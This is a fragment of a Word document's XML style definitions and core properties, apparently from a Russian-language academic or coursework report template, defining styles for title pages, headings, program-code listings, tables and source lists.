    <w:basedOn w:val="a7"/>
    <w:link w:val="afff9"/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff7">
    <w:name w:val="Шапка для титульного листа Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff6"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="Тема работы"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffa"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff9">
    <w:name w:val="Заголовок на титульном листе Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff8"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afffb">
    <w:name w:val="Нумерация"/>
    <w:basedOn w:val="af9"/>
    <w:link w:val="afffc"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffa">
    <w:name w:val="Тема работы Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="a"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afffd">
    <w:name w:val="Используемые источники"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="afffe"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="Абзац списка Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffc">
    <w:name w:val="Нумерация Знак"/>
    <w:basedOn w:val="afa"/>
    <w:link w:val="afffb"/>
    <w:rsid w:val="00744D92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ffff">
    <w:name w:val="Таблица"/>
    <w:basedOn w:val="af"/>
    <w:link w:val="affff0"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="Список_ТИРЕ Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="a1"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="Список_БУКВЫ Знак"/>
    <w:basedOn w:val="aff1"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="Список_ЦИФРЫ Знак"/>
    <w:basedOn w:val="aff2"/>
    <w:link w:val="a4"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffe">
    <w:name w:val="Используемые источники Знак"/>
    <w:basedOn w:val="aff3"/>
    <w:link w:val="afffd"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Рисунок1"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="15"/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Название таблицы Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="2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character" w:customStyle="1" w:styleId="affff0">
    <w:name w:val="Таблица Знак"/>
    <w:basedOn w:val="af0"/>
    <w:link w:val="affff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ffff1">
    <w:name w:val="Приложение"/>
    <w:basedOn w:val="aff"/>
    <w:link w:val="affff2"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Название рисунка Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="2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character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Рисунок1 Знак"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="14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ffff3">
    <w:name w:val="СИ"/>
    <w:basedOn w:val="af1"/>
    <w:link w:val="affff4"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:lang w:val="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="Введение_заключение Знак"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="aff"/>
    <w:rsid w:val="00744D92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affff2">
    <w:name w:val="Приложение Знак"/>
    <w:basedOn w:val="aff0"/>
    <w:link w:val="affff1"/>
    <w:rsid w:val="00744D92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af2">
    <w:name w:val="Программный код Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="3"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="affff4">
    <w:name w:val="СИ Знак"/>
    <w:basedOn w:val="af2"/>
    <w:link w:val="affff3"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affff5">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00E25F81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7"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="005B43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8"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005B432A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-comment">
    <w:name w:val="code-comment"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00160AF8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="006E3D3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="006E3D3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="006E3D3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1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00C064F7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affff6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00C064F7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="1.1"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="delimsizing">
    <w:name w:val="delimsizing"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mbin">
    <w:name w:val="mbin"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mclose">
    <w:name w:val="mclose"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mopen">
    <w:name w:val="mopen"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mpunct">
    <w:name w:val="mpunct"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mrel">
    <w:name w:val="mrel"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F8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p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F8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1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sentencesextension">
    <w:name w:val="sentences___extension"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:styleId="affff7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affff8">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a7"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F8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a6">
    <w:name w:val="Заголовок_пункта"/>
    <w:basedOn w:val="af9"/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="40"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affff9">
    <w:name w:val="Заголовок_таблицы"/>
    <w:basedOn w:val="af3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffa">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffb">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affffc">
    <w:name w:val="Источники"/>
    <w:basedOn w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1276"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affffd">
    <w:name w:val="Название_таблицы"/>
    <w:basedOn w:val="affa"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffe">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Неразрешенное упоминание1"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afffff">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="af9"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="45"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afffff0">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="17">
    <w:name w:val="Сетка таблицы1"/>
    <w:basedOn w:val="a9"/>
    <w:next w:val="afb"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E25F8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f1">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffff2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffff2">
    <w:name w:val="Текст концевой сноски Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afffff1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afffff3">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffff4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffff4">
    <w:name w:val="Текст примечания Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afffff3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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locked/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML2">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F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58460D-032E-4076-8094-01EC594AC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2153</Words>
  <Characters>12274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2026-03-24T14:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-02T14:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>